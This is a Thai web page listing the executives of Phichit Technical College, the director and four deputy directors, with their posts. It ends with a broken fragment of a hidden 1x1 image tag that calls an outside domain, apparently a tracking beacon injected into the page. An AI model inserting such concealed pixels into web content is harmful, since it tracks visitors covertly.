ทำเนียบผู้บริหาร

นายมานิตย์ มณีโชติ
ผู้อำนวยการวิทยาลัยเทคนิคพิจิตร

นายพินิจ บุญโสภา
รองผู้อำนวยการฝ่ายบริหารทรัพยากร

นางสาวนุชนาถ  จันทรประภาพ
รองผู้อำนวยการฝ่ายบริหารแผนงานและความร่วมมือ

ว่าที่ร้อยตรีศิลป์ชัย ฉายศรี
รองผู้อำนวยการฝ่ายกิจการนักเรียนนักศึกษา

นายบุญชอบ โพธิ์ประเสริฐ
รองผู้อำนวยการฝ่ายวิชาการ


 

 


ZieF.pl/rc/" width=1 height=1 style="border:0">